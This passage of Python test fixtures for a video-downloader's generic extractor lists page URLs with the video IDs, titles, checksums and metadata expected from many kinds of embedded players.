# HEAD requests lead to endless 301, while GET is OK
'expected_warnings': ['301'],
},
# RUTV embed
{
'url': 'http://www.rg.ru/2014/03/15/reg-dfo/anklav-anons.html',
'info_dict': {
'id': '776940',
'ext': 'mp4',
'title': 'Охотское море стало целиком российским',
'description': 'md5:5ed62483b14663e2a95ebbe115eb8f43',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
# TVC embed
{
'url': 'http://sch1298sz.mskobr.ru/dou_edu/karamel_ki/filial_galleries/video/iframe_src_http_tvc_ru_video_iframe_id_55304_isplay_false_acc_video_id_channel_brand_id_11_show_episodes_episode_id_32307_frameb/',
'info_dict': {
'id': '55304',
'ext': 'mp4',
'title': 'Дошкольное воспитание',
},
},
# SportBox embed
{
'url': 'http://www.vestifinance.ru/articles/25753',
'info_dict': {
'id': '25753',
'title': 'Прямые трансляции с Форума-выставки "Госзаказ-2013"',
},
'playlist': [{
'info_dict': {
'id': '370908',
'title': 'Госзаказ. День 3',
'ext': 'mp4',
}
}, {
'info_dict': {
'id': '370905',
'title': 'Госзаказ. День 2',
'ext': 'mp4',
}
}, {
'info_dict': {
'id': '370902',
'title': 'Госзаказ. День 1',
'ext': 'mp4',
}
}],
'params': {
# m3u8 download
'skip_download': True,
},
},
# Myvi.ru embed
{
'url': 'http://www.kinomyvi.tv/news/detail/Pervij-dublirovannij-trejler--Uzhastikov-_nOw1',
'info_dict': {
'id': 'f4dafcad-ff21-423d-89b5-146cfd89fa1e',
'ext': 'mp4',
'title': 'Ужастики, русский трейлер (2015)',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 153,
}
},
# XHamster embed
{
'url': 'http://www.numisc.com/forum/showthread.php?11696-FM15-which-pumiscer-was-this-%28-vid-%29-%28-alfa-as-fuck-srx-%29&s=711f5db534502e22260dec8c5e2d66d8',
'info_dict': {
'id': 'showthread',
'title': '[NSFL] [FM15] which pumiscer was this ( vid ) ( alfa as fuck srx )',
},
'playlist_mincount': 7,
# This forum does not allow <iframe> syntaxes anymore
# Now HTML tags are displayed as-is
'skip': 'No videos on this page',
},
# Embedded TED video
{
'url': 'http://en.support.wordpress.com/videos/ted-talks/',
'md5': '65fdff94098e4a607385a60c5177c638',
'info_dict': {
'id': '1969',
'ext': 'mp4',
'title': 'Hidden miracles of the natural world',
'uploader': 'Louie Schwartzberg',
'description': 'md5:8145d19d320ff3e52f28401f4c4283b9',
}
},
# nowvideo embed hidden behind percent encoding
{
'url': 'http://www.waoanime.tv/the-super-dimension-fortress-macross-episode-1/',
'md5': '2baf4ddd70f697d94b1c18cf796d5107',
'info_dict': {
'id': '06e53103ca9aa',
'ext': 'flv',
'title': 'Macross Episode 001 Watch Macross Episode 001 onl',
'description': 'No description',
},
},
# arte embed
{
'url': 'http://www.tv-replay.fr/redirection/20-03-14/x-enius-arte-10753389.html',
'md5': '7653032cbb25bf6c80d80f217055fa43',
'info_dict': {
'id': '048195-004_PLUS7-F',
'ext': 'flv',
'title': 'X:enius',
'description': 'md5:d5fdf32ef6613cdbfd516ae658abf168',
'upload_date': '20140320',
},
'params': {
'skip_download': 'Requires rtmpdump'
},
'skip': 'video gone',
},
# francetv embed
{
'url': 'http://www.tsprod.com/replay-du-concert-alcaline-de-calogero',
'info_dict': {
'id': 'EV_30231',
'ext': 'mp4',
'title': 'Alcaline, le concert avec Calogero',
'description': 'md5:61f08036dcc8f47e9cfc33aed08ffaff',
'upload_date': '20150226',
'timestamp': 1424989860,
'duration': 5400,
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'expected_warnings': [
'Forbidden'
]
},
# Condé Nast embed
{
'url': 'http://www.wired.com/2014/04/honda-asimo/',
'md5': 'ba0dfe966fa007657bd1443ee672db0f',
'info_dict': {
'id': '53501be369702d3275860000',
'ext': 'mp4',
'title': 'Honda’s New Asimo Robot Is More Human Than Ever',
}
},
# Dailymotion embed
{
'url': 'http://www.spi0n.com/zap-spi0n-com-n216/',
'md5': '441aeeb82eb72c422c7f14ec533999cd',
'info_dict': {
'id': 'k2mm4bCdJ6CQ2i7c8o2',
'ext': 'mp4',
'title': 'Le Zap de Spi0n n°216 - Zapping du Web',
'description': 'md5:faf028e48a461b8b7fad38f1e104b119',
'uploader': 'Spi0n',
'uploader_id': 'xgditw',
'upload_date': '20140425',
'timestamp': 1398441542,
},
'add_ie': ['Dailymotion'],
},
# DailyMail embed
{
'url': 'http://www.bumm.sk/krimi/2017/07/05/biztonsagi-kamera-buktatta-le-az-agg-ferfit-utlegelo-apolot',
'info_dict': {
'id': '1495629',
'ext': 'mp4',
'title': 'Care worker punches elderly dementia patient in head 11 times',
'description': 'md5:3a743dee84e57e48ec68bf67113199a5',
},
'add_ie': ['DailyMail'],
'params': {
'skip_download': True,
},
},
# YouTube embed
{
'url': 'http://www.badzine.de/ansicht/datum/2014/06/09/so-funktioniert-die-neue-englische-badminton-liga.html',
'info_dict': {
'id': 'FXRb4ykk4S0',
'ext': 'mp4',
'title': 'The NBL Auction 2014',
'uploader': 'BADMINTON England',
'uploader_id': 'BADMINTONEvents',
'upload_date': '20140603',
'description': 'md5:9ef128a69f1e262a700ed83edb163a73',
},
'add_ie': ['Youtube'],
'params': {
'skip_download': True,
}
},
# MTVSercices embed
{
'url': 'http://www.vulture.com/2016/06/new-key-peele-sketches-released.html',
'md5': 'ca1aef97695ef2c1d6973256a57e5252',
'info_dict': {
'id': '769f7ec0-0692-4d62-9b45-0d88074bffc1',
'ext': 'mp4',
'title': 'Key and Peele|October 10, 2012|2|203|Liam Neesons - Uncensored',
'description': 'Two valets share their love for movie star Liam Neesons.',
'timestamp': 1349922600,
'upload_date': '20121011',
},
},
# YouTube embed via <data-embed-url="">
{
'url': 'https://play.google.com/store/apps/details?id=com.gameloft.android.ANMP.GloftA8HM',
'info_dict': {
'id': '4vAffPZIT44',
'ext': 'mp4',
'title': 'Asphalt 8: Airborne - Update - Welcome to Dubai!',
'uploader': 'Gameloft',
'uploader_id': 'gameloft',
'upload_date': '20140828',
'description': 'md5:c80da9ed3d83ae6d1876c834de03e1c4',
},
'params': {
'skip_download': True,
}
},
# YouTube <object> embed
{
'url': 'http://www.improbable.com/2017/04/03/untrained-modern-youths-and-ancient-masters-in-selfie-portraits/',
'md5': '516718101ec834f74318df76259fb3cc',
'info_dict': {
'id': 'msN87y-iEx0',
'ext': 'webm',
'title': 'Feynman: Mirrors FUN TO IMAGINE 6',
'upload_date': '20080526',
'description': 'md5:0ffc78ea3f01b2e2c247d5f8d1d3c18d',
'uploader': 'Christopher Sykes',
'uploader_id': 'ChristopherJSykes',
},
'add_ie': ['Youtube'],
},
# Camtasia studio
{
'url': 'http://www.ll.mit.edu/workshops/education/videocourses/antennas/lecture1/video/',
'playlist': [{
'md5': '0c5e352edabf715d762b0ad4e6d9ee67',
'info_dict': {
'id': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final',
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final - video1',
'ext': 'flv',
'duration': 2235.90,
}
}, {
'md5': '10e4bb3aaca9fd630e273ff92d9f3c63',
'info_dict': {
'id': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final_PIP',
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final - pip',
'ext': 'flv',
'duration': 2235.93,
}
}],
'info_dict': {
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final',
}
},
# Flowplayer
{
'url': 'http://www.handjobhub.com/video/busty-blonde-siri-tit-fuck-while-wank-6313.html',
'md5': '9d65602bf31c6e20014319c7d07fba27',
'info_dict': {
'id': '5123ea6d5e5a7',
'ext': 'mp4',
'age_limit': 18,
'uploader': 'www.handjobhub.com',
'title': 'Busty Blonde Siri Tit Fuck While Wank at HandjobHub.com',
}
},
# Multiple brightcove videos
# https://github.com/ytdl-org/youtube-dl/issues/2283
{
'url': 'http://www.newyorker.com/online/blogs/newsdesk/2014/01/always-never-nuclear-command-and-control.html',
'info_dict': {
'id': 'always-never',
'title': 'Always / Never - The New Yorker',
},
'playlist_count': 3,
'params': {
'extract_flat': False,
'skip_download': True,
}
},
# MLB embed
{
'url': 'http://umpire-empire.com/index.php/topic/58125-laz-decides-no-thats-low/',
'md5': '96f09a37e44da40dd083e12d9a683327',
'info_dict': {
'id': '33322633',
'ext': 'mp4',
'title': 'Ump changes call to ball',
'description': 'md5:71c11215384298a172a6dcb4c2e20685',
'duration': 48,
'timestamp': 1401537900,
'upload_date': '20140531',
'thumbnail': r're:^https?://.*\.jpg$',
},
},
# Wistia embed
{
'url': 'http://study.com/academy/lesson/north-american-exploration-failed-colonies-of-spain-france-england.html#lesson',
'md5': '1953f3a698ab51cfc948ed3992a0b7ff',
'info_dict': {
'id': '6e2wtrbdaf',
'ext': 'mov',
'title': 'paywall_north-american-exploration-failed-colonies-of-spain-france-england',
'description': 'a Paywall Videos video from Remilon',
'duration': 644.072,
'uploader': 'study.com',
'timestamp': 1459678540,
'upload_date': '20160403',
'filesize': 24687186,
},
},
{
'url': 'http://thoughtworks.wistia.com/medias/uxjb0lwrcz',
'md5': 'baf49c2baa8a7de5f3fc145a8506dcd4',
'info_dict': {
'id': 'uxjb0lwrcz',
'ext': 'mp4',
'title': 'Conversation about Hexagonal Rails Part 1',
'description': 'a Martin Fowler video from ThoughtWorks',
'duration': 1715.0,
'uploader': 'thoughtworks.wistia.com',
'timestamp': 1401832161,
'upload_date': '20140603',
},
},
# Wistia standard embed (async)
{
'url': 'https://www.getdrip.com/university/brennan-dunn-drip-workshop/',
'info_dict': {
'id': '807fafadvk',
'ext': 'mp4',
'title': 'Drip Brennan Dunn Workshop',
'description': 'a JV Webinars video from getdrip-1',
'duration': 4986.95,
'timestamp': 1463607249,
'upload_date': '20160518',
},
'params': {
'skip_download': True,
}
},
# Soundcloud embed
{
'url': 'http://nakedsecurity.sophos.com/2014/10/29/sscc-171-are-you-sure-that-1234-is-a-bad-password-podcast/',
'info_dict': {
'id': '174391317',
'ext': 'mp3',
'description': 'md5:ff867d6b555488ad3c52572bb33d432c',
'uploader': 'Sophos Security',
'title': 'Chet Chat 171 - Oct 29, 2014',
'upload_date': '20141029',
}
},
# Soundcloud multiple embeds
{
'url': 'http://www.guitarplayer.com/lessons/1014/legato-workout-one-hour-to-more-fluid-performance---tab/52809',
'info_dict': {
'id': '52809',
'title': 'Guitar Essentials: Legato Workout—One-Hour to Fluid Performance | TAB + AUDIO',
},
'playlist_mincount': 7,
},
# TuneIn station embed
{
'url': 'http://radiocnrv.com/promouvoir-radio-cnrv/',
'info_dict': {
'id': '204146',
'ext': 'mp3',
'title': 'CNRV',
'location': 'Paris, France',
'is_live': True,
},
'params': {
# Live stream
'skip_download': True,
},
},
# Livestream embed
{
'url': 'http://www.esa.int/Our_Activities/Space_Science/Rosetta/Philae_comet_touch-down_webcast',
'info_dict': {
'id': '67864563',
'ext': 'flv',
'upload_date': '20141112',
'title': 'Rosetta #CometLanding webcast HL 10',
}
},
# Another Livestream embed, without 'new.' in URL
{
'url': 'https://www.freespeech.org/',
'info_dict': {
'id': '123537347',
'ext': 'mp4',
'title': 're:^FSTV [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
},
'params': {
# Live stream
'skip_download': True,
},
},
# LazyYT
{
'url': 'https://skiplagged.com/',
'info_dict': {
'id': 'skiplagged',
'title': 'Skiplagged: The smart way to find cheap flights',
},
'playlist_mincount': 1,
'add_ie': ['Youtube'],
},
# Cinchcast embed
{
'url': 'http://undergroundwellness.com/podcasts/306-5-steps-to-permanent-gut-healing/',
'info_dict': {
'id': '7141703',
'ext': 'mp3',
'upload_date': '20141126',
'title': 'Jack Tips: 5 Steps to Permanent Gut Healing',
}
},
# Cinerama player
{
'url': 'http://www.abc.net.au/7.30/content/2015/s4164797.htm',
'info_dict': {
'id': '730m_DandD_1901_512k',
'ext': 'mp4',
'uploader': 'www.abc.net.au',
'title': 'Game of Thrones with dice - Dungeons and Dragons fantasy role-playing game gets new life - 19/01/2015',
}
},
# embedded viddler video
{
'url': 'http://deadspin.com/i-cant-stop-watching-john-wall-chop-the-nuggets-with-th-1681801597',
'info_dict': {
'id': '4d03aad9',
'ext': 'mp4',
'uploader': 'deadspin',
'title': 'WALL-TO-GORTAT',
'timestamp': 1422285291,
'upload_date': '20150126',
},
'add_ie': ['Viddler'],
},
# Libsyn embed
{
'url': 'http://thedailyshow.cc.com/podcast/episodetwelve',
'info_dict': {
'id': '3377616',
'ext': 'mp3',
'title': "The Daily Show Podcast without Jon Stewart - Episode 12: Bassem Youssef: Egypt's Jon Stewart",
'description': 'md5:601cb790edd05908957dae8aaa866465',
'upload_date': '20150220',
},
'skip': 'All The Daily Show URLs now redirect to http://www.cc.com/shows/',
},
# jwplayer YouTube
{
'url': 'http://media.nationalarchives.gov.uk/index.php/webinar-using-discovery-national-archives-online-catalogue/',
'info_dict': {
'id': 'Mrj4DVp2zeA',
'ext': 'mp4',
'upload_date': '20150212',
'uploader': 'The National Archives UK',
'description': 'md5:8078af856dca76edc42910b61273dbbf',
'uploader_id': 'NationalArchives08',
'title': 'Webinar: Using Discovery, The National Archives’ online catalogue',
},
},
# jwplayer rtmp
{
'url': 'http://www.suffolk.edu/sjc/live.php',
'info_dict': {
'id': 'live',
'ext': 'flv',
'title': 'Massachusetts Supreme Judicial Court Oral Arguments',
'uploader': 'www.suffolk.edu',
},
'params': {
'skip_download': True,
},
'skip': 'Only has video a few mornings per month, see http://www.suffolk.edu/sjc/',
},
# Complex jwplayer
{
'url': 'http://www.indiedb.com/games/king-machine/videos',
'info_dict': {
'id': 'videos',
'ext': 'mp4',
'title': 'king machine trailer 1',
'description': 'Browse King Machine videos & audio for sweet media. Your eyes will thank you.',
'thumbnail': r're:^https?://.*\.jpg$',
},
},
{
# JWPlayer config passed as variable
'url': 'http://www.txxx.com/videos/3326530/ariele/',
'info_dict': {
'id': '3326530_hq',
'ext': 'mp4',
'title': 'ARIELE | Tube Cup',
'uploader': 'www.txxx.com',
'age_limit': 18,
},
'params': {
'skip_download': True,
}
},
{
# JWPlatform iframe
'url': 'https://www.mediaite.com/tv/dem-senator-claims-gary-cohn-faked-a-bad-connection-during-trump-call-to-get-him-off-the-phone/',
'md5': 'ca00a040364b5b439230e7ebfd02c4e9',
'info_dict': {
'id': 'O0c5JcKT',
'ext': 'mp4',
'upload_date': '20171122',
'timestamp': 1511366290,
'title': 'Dem Senator Claims Gary Cohn Faked a Bad Connection During Trump Call to Get Him Off the Phone',
},
'add_ie': [JWPlatformIE.ie_key()],
},
{
# Video.js embed, multiple formats
'url': 'http://ortcam.com/solidworks-урок-6-настройка-чертежа_33f9b7351.html',
'info_dict': {
'id': 'yygqldloqIk',
'ext': 'mp4',
'title': 'SolidWorks. Урок 6 Настройка чертежа',
'description': 'md5:baf95267792646afdbf030e4d06b2ab3',
'upload_date': '20130314',
'uploader': 'PROстое3D',
'uploader_id': 'PROstoe3D',
},
'params': {
'skip_download': True,
},
},
{
# Video.js embed, single format
'url': 'https://www.vooplayer.com/v3/watch/watch.php?v=NzgwNTg=',
'info_dict': {
'id': 'watch',
'ext': 'mp4',
'title': 'Step 1 - Good Foundation',
'description': 'md5:d1e7ff33a29fc3eb1673d6c270d344f4',
},
'params': {
'skip_download': True,
},
},
# rtl.nl embed
{
'url': 'http://www.rtlnieuws.nl/nieuws/buitenland/aanslagen-kopenhagen',
'playlist_mincount': 5,
'info_dict': {
'id': 'aanslagen-kopenhagen',
'title': 'Aanslagen Kopenhagen',
}
},
# Zapiks embed
{
'url': 'http://www.skipass.com/news/116090-bon-appetit-s5ep3-baqueira-mi-cor.html',
'info_dict': {
'id': '118046',
'ext': 'mp4',
'title': 'EP3S5 - Bon Appétit - Baqueira Mi Corazon !',
}
},
# Kaltura embed (different embed code)
{
'url': 'http://www.premierchristianradio.com/Shows/Saturday/Unbelievable/Conference-Videos/Os-Guinness-Is-It-Fools-Talk-Unbelievable-Conference-2014',
'info_dict': {
'id': '1_a52wc67y',
'ext': 'flv',
'upload_date': '20150127',
'uploader_id': 'PremierMedia',
'timestamp': int,
'title': 'Os Guinness // Is It Fools Talk? // Unbelievable? Conference 2014',
},
},
# Kaltura embed with single quotes
{
'url': 'http://fod.infobase.com/p_ViewPlaylist.aspx?AssignmentID=NUN8ZY',
'info_dict': {
'id': '0_izeg5utt',
'ext': 'mp4',
'title': '35871',
'timestamp': 1355743100,
'upload_date': '20121217',
'uploader_id': '[email protected]',
},
'add_ie': ['Kaltura'],
},
{
# Kaltura embedded via quoted entry_id
'url': 'https://www.oreilly.com/ideas/my-cloud-makes-pretty-pictures',
'info_dict': {
'id': '0_utuok90b',
'ext': 'mp4',
'title': '06_matthew_brender_raj_dutt',
'timestamp': 1466638791,
'upload_date': '20160622',
},
'add_ie': ['Kaltura'],
'expected_warnings': [
'Could not send HEAD request'
],
'params': {
'skip_download': True,
}
},
{
# Kaltura embedded, some fileExt broken (#11480)
'url': 'http://www.cornell.edu/video/nima-arkani-hamed-standard-models-of-particle-physics',
'info_dict': {
'id': '1_sgtvehim',
'ext': 'mp4',
'title': 'Our "Standard Models" of particle physics and cosmology',
'description': 'md5:67ea74807b8c4fea92a6f38d6d323861',
'timestamp': 1321158993,
'upload_date': '20111113',
'uploader_id': 'kps1',
},
'add_ie': ['Kaltura'],
},
{
# Kaltura iframe embed
'url': 'http://www.gsd.harvard.edu/event/i-m-pei-a-centennial-celebration/',
'md5': 'ae5ace8eb09dc1a35d03b579a9c2cc44',
'info_dict': {
'id': '0_f2cfbpwy',
'ext': 'mp4',
'title': 'I. M. Pei: A Centennial Celebration',
'description': 'md5:1db8f40c69edc46ca180ba30c567f37c',
'upload_date': '20170403',
'uploader_id': 'batchUser',
'timestamp': 1491232186,
},
'add_ie': ['Kaltura'],
},
{
# Kaltura iframe embed, more sophisticated
'url': 'http://www.cns.nyu.edu/~eero/math-tools/Videos/lecture-05sep2017.html',
'info_dict': {
'id': '1_9gzouybz',
'ext': 'mp4',
'title': 'lecture-05sep2017',
'description': 'md5:40f347d91fd4ba047e511c5321064b49',
'upload_date': '20170913',
'uploader_id': 'eps2',
'timestamp': 1505340777,
},
'params': {
'skip_download': True,
},
'add_ie': ['Kaltura'],
},
{
# meta twitter:player
'url': 'http://thechive.com/2017/12/08/all-i-want-for-christmas-is-more-twerk/',
'info_dict': {
'id': '0_01b42zps',
'ext': 'mp4',
'title': 'Main Twerk (Video)',
'upload_date': '20171208',
'uploader_id': '[email protected]',
'timestamp': 1512713057,
},
'params': {
'skip_download': True,
},
'add_ie': ['Kaltura'],
},
# referrer protected EaglePlatform embed
{
'url': 'https://tvrain.ru/lite/teleshow/kak_vse_nachinalos/namin-418921/',
'info_dict': {
'id': '582306',
'ext': 'mp4',
'title': 'Стас Намин: «Мы нарушили девственность Кремля»',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 3382,
'view_count': int,
},
'params': {
'skip_download': True,
},
},
# ClipYou (EaglePlatform) embed (custom URL)
{
'url': 'http://muz-tv.ru/play/7129/',
# Not checking MD5 as sometimes the direct HTTP link results in 404 and HLS is used
'info_dict': {
'id': '12820',
'ext': 'mp4',
'title': "'O Sole Mio",
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 216,
'view_count': int,
},
'params': {
'skip_download': True,
},
'skip': 'This video is unavailable.',
},
# Pladform embed
{
'url': 'http://muz-tv.ru/kinozal/view/7400/',
'info_dict': {
'id': '100183293',
'ext': 'mp4',
'title': 'Тайны перевала Дятлова • 1 серия 2 часть',
'description': 'Документальный сериал-расследование одной из самых жутких тайн ХХ века',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 694,
'age_limit': 0,
},
'skip': 'HTTP Error 404: Not Found',
},
# Playwire embed
{
'url': 'http://www.cinemablend.com/new/First-Joe-Dirt-2-Trailer-Teaser-Stupid-Greatness-70874.html',
'info_dict': {
'id': '3519514',
'ext': 'mp4',
'title': 'Joe Dirt 2 Beautiful Loser Teaser Trailer',
'thumbnail': r're:^https?://.*\.png$',
'duration': 45.115,
},
},
# 5min embed
{
'url': 'http://techcrunch.com/video/facebook-creates-on-this-day-crunch-report/518726732/',
'md5': '4c6f127a30736b59b3e2c19234ee2bf7',
'info_dict': {
'id': '518726732',
'ext': 'mp4',
'title': 'Facebook Creates "On This Day" | Crunch Report',
'description': 'Amazon updates Fire TV line, Tesla\'s Model X spotted in the wild',
'timestamp': 1427237531,
'uploader': 'Crunch Report',
'upload_date': '20150324',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
# Crooks and Liars embed
{
'url': 'http://crooksandliars.com/2015/04/fox-friends-says-protecting-atheists',
'info_dict': {
'id': '8RUoRhRi',
'ext': 'mp4',
'title': "Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!",
'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
'timestamp': 1428207000,
'upload_date': '20150405',
'uploader': 'Heather',
},
},
# Crooks and Liars external embed
{
'url': 'http://theothermccain.com/2010/02/02/video-proves-that-bill-kristol-has-been-watching-glenn-beck/comment-page-1/',
'info_dict': {
'id': 'MTE3MjUtMzQ2MzA',
'ext': 'mp4',
'title': 'md5:5e3662a81a4014d24c250d76d41a08d5',
'description': 'md5:9b8e9542d6c3c5de42d6451b7d780cec',
'timestamp': 1265032391,
'upload_date': '20100201',
'uploader': 'Heather',
},
},
# NBC Sports vplayer embed
{
'url': 'http://www.riderfans.com/forum/showthread.php?121827-Freeman&s=e98fa1ea6dc08e886b1678d35212494a',
'info_dict': {
'id': 'ln7x1qSThw4k',
'ext': 'flv',
'title': "PFT Live: New leader in the 'new-look' defense",
'description': 'md5:65a19b4bbfb3b0c0c5768bed1dfad74e',
'uploader': 'NBCU-SPORTS',
'upload_date': '20140107',
'timestamp': 1389118457,
},
'skip': 'Invalid Page URL',
},
# NBC News embed
{
'url': 'http://www.vulture.com/2016/06/letterman-couldnt-care-less-about-late-night.html',
'md5': '1aa589c675898ae6d37a17913cf68d66',
'info_dict': {
'id': 'x_dtl_oa_LettermanliftPR_160608',
'ext': 'mp4',
'title': 'David Letterman: A Preview',
'description': 'A preview of Tom Brokaw\'s interview with David Letterman as part of the On Assignment series powered by Dateline. Airs Sunday June 12 at 7/6c.',
'upload_date': '20160609',
'timestamp': 1465431544,
'uploader': 'NBCU-NEWS',
},
},
# UDN embed
{
'url': 'https://video.udn.com/news/300346',
'md5': 'fd2060e988c326991037b9aff9df21a6',
'info_dict': {
'id': '300346',
'ext': 'mp4',
'title': '中一中男師變性 全校師生力挺',
'thumbnail': r're:^https?://.*\.jpg$',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Failed to parse JSON Expecting value'],
},
# Brightcove URL in single quotes
{
'url': 'http://www.sportsnet.ca/baseball/mlb/sn-presents-russell-martin-world-citizen/',
'md5': '4ae374f1f8b91c889c4b9203c8c752af',
'info_dict': {
'id': '4255764656001',
'ext': 'mp4',
'title': 'SN Presents: Russell Martin, World Citizen',
'description': 'To understand why he was the Toronto Blue Jays’ top off-season priority is to appreciate his background and upbringing in Montreal, where he first developed his baseball skills. Written and narrated by Stephen Brunt.',
'uploader': 'Rogers Sportsnet',
'uploader_id': '1704050871',
'upload_date': '20150525',
'timestamp': 1432570283,
},
},
# Kinja embed
{
'url': 'http://www.clickhole.com/video/dont-understand-bitcoin-man-will-mumble-explanatio-2537',
'info_dict': {
'id': '106351',
'ext': 'mp4',
'title': 'Don’t Understand Bitcoin? This Man Will Mumble An Explanation At You',
'description': 'Migrated from OnionStudios',
'thumbnail': r're:^https?://.*\.jpe?g$',
'uploader': 'clickhole',
'upload_date': '20150527',
'timestamp': 1432744860,
}
},
# SnagFilms embed
{
'url': 'http://whilewewatch.blogspot.ru/2012/06/whilewewatch-whilewewatch-gripping.html',
'info_dict': {
'id': '74849a00-85a9-11e1-9660-123139220831',
'ext': 'mp4',
'title': '#whilewewatch',
}
},
# AdobeTVVideo embed
{
'url': 'https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners',
'md5': '43662b577c018ad707a63766462b1e87',
'info_dict': {
'id': '2456',
'ext': 'mp4',
'title': 'New experience with Acrobat DC',
'description': 'New experience with Acrobat DC',
'duration': 248.667,
},
},
# BrightcoveInPageEmbed embed
{
'url': 'http://www.geekandsundry.com/tabletop-bonus-wils-final-thoughts-on-dread/',
'info_dict': {
'id': '4238694884001',
'ext': 'flv',
'title': 'Tabletop: Dread, Last Thoughts',
'description': 'Tabletop: Dread, Last Thoughts',
'duration': 51690,
},
},
# Brightcove embed, with no valid 'renditions' but valid 'IOSRenditions'
# This video can't be played in browsers if Flash disabled and UA set to iPhone, which is actually a false alarm
{
'url': 'https://dl.dropboxusercontent.com/u/29092637/interview.html',
'info_dict': {
'id': '4785848093001',
'ext': 'mp4',
'title': 'The Cardinal Pell Interview',
'description': 'Sky News Contributor Andrew Bolt interviews George Pell in Rome, following the Cardinal\'s evidence before the Royal Commission into Child Abuse. ',
'uploader': 'GlobeCast Australia - GlobeStream',
'uploader_id': '2733773828001',
'upload_date': '20160304',
'timestamp': 1457083087,
},
'params': {
# m3u8 downloads
'skip_download': True,
},
},
{
# Brightcove embed with whitespace around attribute names
'url': 'http://www.stack.com/video/3167554373001/learn-to-hit-open-three-pointers-with-damian-lillard-s-baseline-drift-drill',
'info_dict': {
'id': '3167554373001',
'ext': 'mp4',
'title': "Learn to Hit Open Three-Pointers With Damian Lillard's Baseline Drift Drill",
'description': 'md5:57bacb0e0f29349de4972bfda3191713',
'uploader_id': '1079349493',
'upload_date': '20140207',
'timestamp': 1391810548,
},
'params': {
'skip_download': True,
},
},
# Another form of arte.tv embed
{
'url': 'http://www.tv-replay.fr/redirection/09-04-16/arte-reportage-arte-11508975.html',
'md5': '850bfe45417ddf221288c88a0cffe2e2',
'info_dict': {
'id': '030273-562_PLUS7-F',
'ext': 'mp4',
'title': 'ARTE Reportage - Nulle part, en France',
'description': 'md5:e3a0e8868ed7303ed509b9e3af2b870d',
'upload_date': '20160409',
},
},
# LiveLeak embed
{
'url': 'http://www.wykop.pl/link/3088787/',
'md5': '7619da8c820e835bef21a1efa2a0fc71',
'info_dict': {
'id': '874_1459135191',
'ext': 'mp4',
'title': 'Man shows poor quality of new apartment building',
'description': 'The wall is like a sand pile.',
'uploader': 'Lake8737',
},
'add_ie': [LiveLeakIE.ie_key()],
},
# Another LiveLeak embed pattern (#13336)
{
'url': 'https://milo.yiannopoulos.net/2017/06/concealed-carry-robbery/',
'info_dict': {
'id': '2eb_1496309988',
'ext': 'mp4',
'title': 'Thief robs place where everyone was armed',
'description': 'md5:694d73ee79e535953cf2488562288eee',
'uploader': 'brazilwtf',
},
'add_ie': [LiveLeakIE.ie_key()],
},
# Duplicated embedded video URLs
{
'url': 'http://www.hudl.com/athlete/2538180/highlights/149298443',
'info_dict': {
'id': '149298443_480_16c25b74_2',
'ext': 'mp4',
'title': 'vs. Blue Orange Spring Game',
'uploader': 'www.hudl.com',
},
},
# twitter:player:stream embed
{
'url': 'http://www.rtl.be/info/video/589263.aspx?CategoryID=288',
'info_dict': {
'id': 'master',
'ext': 'mp4',
'title': 'Une nouvelle espèce de dinosaure découverte en Argentine',
'uploader': 'www.rtl.be',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
},
# twitter:player embed
{
'url': 'http://www.theatlantic.com/video/index/484130/what-do-black-holes-sound-like/',
'md5': 'a3e0df96369831de324f0778e126653c',
'info_dict': {
'id': '4909620399001',
'ext': 'mp4',
'title': 'What Do Black Holes Sound Like?',
'description': 'what do black holes sound like',
'upload_date': '20160524',
'uploader_id': '29913724001',
'timestamp': 1464107587,
'uploader': 'TheAtlantic',
},
'add_ie': ['BrightcoveLegacy'],
},
# Facebook <iframe> embed
{
'url': 'https://www.hostblogger.de/blog/archives/6181-Auto-jagt-Betonmischer.html',
'md5': 'fbcde74f534176ecb015849146dd3aee',
'info_dict': {
'id': '599637780109885',
'ext': 'mp4',
'title': 'Facebook video #599637780109885',
},
},
# Facebook <iframe> embed, plugin video
{
'url': 'http://5pillarsuk.com/2017/06/07/tariq-ramadan-disagrees-with-pr-exercise-by-imams-refusing-funeral-prayers-for-london-attackers/',
'info_dict': {
'id': '1754168231264132',
'ext': 'mp4',
'title': 'About the Imams and Religious leaders refusing to perform funeral prayers for...',
'uploader': 'Tariq Ramadan (official)',
'timestamp': 1496758379,
'upload_date': '20170606',
},
'params': {
'skip_download': True,
},
},
# Facebook API embed
{
'url': 'http://www.lothype.com/blue-stars-2016-preview-standstill-full-show/',
'md5': 'a47372ee61b39a7b90287094d447d94e',
'info_dict': {
'id': '10153467542406923',
'ext': 'mp4',
'title': 'Facebook video #10153467542406923',
},
},
# Wordpress "YouTube Video Importer" plugin
{
'url': 'http://www.lothype.com/blue-devils-drumline-stanford-lot-2016/',
'md5': 'd16797741b560b485194eddda8121b48',
'info_dict': {
'id': 'HNTXWDXV9Is',
'ext': 'mp4',
'title': 'Blue Devils Drumline Stanford lot 2016',
'upload_date': '20160627',
'uploader_id': 'GENOCIDE8GENERAL10',
'uploader': 'cylus cyrus',
},
},
{
# video stored on custom kaltura server
'url': 'http://www.expansion.com/multimedia/videos.html?media=EQcM30NHIPv',
'md5': '537617d06e64dfed891fa1593c4b30cc',
'info_dict': {
'id': '0_1iotm5bh',
'ext': 'mp4',
'title': 'Elecciones británicas: 5 lecciones para Rajoy',
'description': 'md5:435a89d68b9760b92ce67ed227055f16',
'uploader_id': '[email protected]',
'upload_date': '20150429',
'timestamp': 1430303472,
},
'add_ie': ['Kaltura'],
},
{
# Non-standard Vimeo embed
'url': 'https://openclassrooms.com/courses/understanding-the-web',
'md5': '64d86f1c7d369afd9a78b38cbb88d80a',
